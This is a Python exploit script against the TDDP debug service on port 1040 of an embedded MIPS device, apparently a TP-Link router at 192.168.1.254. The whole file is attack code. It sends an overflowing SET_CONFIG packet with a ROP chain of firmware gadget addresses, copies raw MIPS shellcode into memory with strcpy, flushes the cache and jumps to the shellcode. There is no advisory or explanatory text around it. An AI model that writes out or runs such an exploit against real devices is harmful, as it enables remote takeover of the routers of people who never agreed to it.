exploit.py

import socket
import re
import string 
from tddp_protocol import TDDPSessionV1

HOST = "192.168.1.254"
PORT = 1040
		
class Exploit(TDDPSessionV1):
		
	def run(self):
		c_packet = self.req_buidler.getRequestPacket()
		c_packet['type'] = self.req_buidler.SET_CONFIG

		jal_ra = "\xFF\xFC\x7a\x44" # call to addess 0x800968fc
									# ROM:800968FC	move    $v0, $zero
									# ROM:80096900	lw      $ra, arg_10($sp)
									# ROM:80096904	jr      $ra
									# ROM:80096908	addiu   $sp, 0x18

		set_v0 = "\x80\x02\x13\xF8" # ROM:800213F8 lw      $ra, arg_1C($sp)
									# ROM:800213FC move    $v0, $s0
									# ROM:80021400 lw      $s0, arg_18($sp)
									# ROM:80021404 jr      $ra
									# ROM:80021408 addiu   $sp, 0x20
									
		test_jal_v0 = "\x80\x01\x3f\x08" 
		add_and_jal_v0 = "\x80\x16\x8d\x7c" # ROM:80168D7C move    $a1, $sp
											# ROM:80168D80 addiu   $a2, $sp, 0x28
											# ROM:80168D84 la      $t0, off_802E28B4
											# ROM:80168D8C addu    $v0, $t0
											# ROM:80168D90 lw      $v0, 0($v0)
											# ROM:80168D94 jalr    $v0    (0x800968fc)
		
		move_a1_a2 = "\x80\x1e\x6f\x88"		# ROM:801E6F88                 move    $a1, $a2
											# ROM:801E6F8C                 lw      $ra, 0x20($sp)
											# ROM:801E6F90                 lw      $fp, 0x24($sp)
											# ROM:801E6F94                 jr      $ra
											# ROM:801E6F98                 addiu   $sp, 0x28									
		
		jalr_s3 = "\x80\x16\x6B\x68"
		strcpy = "\x80\x04\x93\xF8" # ROM:800493F8                 move    $a0, $s3
									# ROM:800493FC                 jal     strcpy
									# ROM:80049400                 move    $s1, $zero
									# ROM:80049404                 move    $v0, $s1
									# ROM:80049408                 lw      $ra, 0x20($sp)
									# ROM:8004940C                 lw      $s3, 0x1C($sp)
									# ROM:80049410                 lw      $s2, 0x18($sp)
									# ROM:80049414                 lw      $s1, 0x14($sp)
									# ROM:80049418                 lw      $s0, 0x10($sp)
									# ROM:8004941C                 jr      $ra
									# ROM:80049420                 addiu   $sp, 0x28				

		
		#this is the address where the shellcode will be paste
		dst_shellcode_base = "\x80\x16\xbb\x84"
					
		invalidate_cache = "\x80\x16\xb9\x10"		
		opcode_jalr_s2="\x02\x40\xf8\x09"	
		opcode_jalr_fp="\x03\xc0\xf8\x09"
		
		#this is the address where the shellcode starts to execute
		addr_shellcode = "\x80\x16\xbb\xc4"
		
		########################
		move_a0_tddp_socket = "\x3c\x04\x80\x2d\x34\x84\xf9\x24"   # la $a0, 802fd924  	
		move_a0_tddp_socket += "\x8c\x84\xff\xfc"				   # lw $a0, -4($a0)
		########################
		
		
		########################
		test_a0 = "\x02\x52\x90\x26"	#xor $s2,$s2
		test_a0 += "\x02\x44\x90\x26"   #or $s2, $a0
		test_a0 += opcode_jalr_s2
		test_a0 +="\x24\x10\x10\x10"						    #li $s0, 0x1010 #UNUSED		
		########################
		
		
		jalr_invalidate_cache = "\x24\x08\x55\x58"				#li $t0,0x5558
		jalr_invalidate_cache += "\x24\x09\x55\x58"				#li $t1,0x5558
		jalr_invalidate_cache += "\x3c\x12\x80\x16\x36\x52\xb9\x10"				  #la  $s2, 0x8016b910
		jalr_invalidate_cache += opcode_jalr_s2
		jalr_invalidate_cache +="\x24\x10\x10\x10"						    #li $s0, 0x1010 #UNUSED		
		
		
		getpc = "\x0c\x05\x67\x57"		#jal 0x80159d5c
		getpc += "\x24\x10\x10\x10"						    #li $s0, 0x1010 #UNUSED	
		
			
		move_fp_ra = "\x03\xe0\xf0\x25" #move $fp, $ra

		add_fp = '\x23\xde\x10\x10'
		add_fp += '\x23\xde\xF0\x14'
				
		get_v0_eq_0_opcode = '\x3c\x13\x80\x11\x36\x73\x89\x18'	# la $s3, 0x80118918
		get_v0_eq_0_opcode += '\x8e\x72\xff\xfc'				# lw $s2, -4($s3)		
		load_v0 = get_v0_eq_0_opcode
		load_v0 += "\x3c\x13\x80\x15\x36\x73\x9c\xd8"   #la $s3, 0x80159cd8
		load_v0 += "\xae\x72\xff\xfc"					#sw $s2, -4($s3)
		###########################################################################################
		
		#load_v0_2 = "\x3c\x12\x24\x02\x36\x52\x10\x10"	#li $s2,0x24021010 (opcode: li v0, 0x1010)
		load_v0_2 = get_v0_eq_0_opcode
		load_v0_2 += "\x3c\x13\x80\x15\x36\x73\x9d\x04"   #la $s3, 0x80159D04
		load_v0_2 += "\xae\x72\xff\xfc"					#sw $s2, -4($s3)
		###########################################################################################
		
		
		shellcode = load_v0
		shellcode += load_v0_2
		
		shellcode += getpc
		shellcode += move_fp_ra 		# 4
		shellcode += add_fp				#	8
		shellcode += jalr_invalidate_cache #0x18
		
		#call the filedescriptor (used to verify if it was ok!)		
		shellcode += move_a0_tddp_socket
		shellcode += test_a0
		
		
			
		PADDING_0="A" *0x28
		PADDING_1="A" * 0x8		
		PADDING_2="A" * 0x20
		PADDING_3="A" * 0x10
		PADDING_4="A" * 0x14
		PADDING_5 = "A"*0x0C 
		PADDING_6 = "A" * 0x20
		PADDING_7 = "A" * 0x4
		
		c_packet['payload'] = PADDING_0 + jal_ra + PADDING_1 + dst_shellcode_base + set_v0 + PADDING_2 + add_and_jal_v0 + PADDING_3 + move_a1_a2 + PADDING_4 + opcode_jalr_fp + PADDING_5+ strcpy + addr_shellcode + PADDING_6 + invalidate_cache + addr_shellcode + PADDING_7 + shellcode + "\x00"
		c_packet['packetLength'] = 0x0264	
		
		
		return self.send(c_packet)

		
s = Exploit(HOST)
s.run()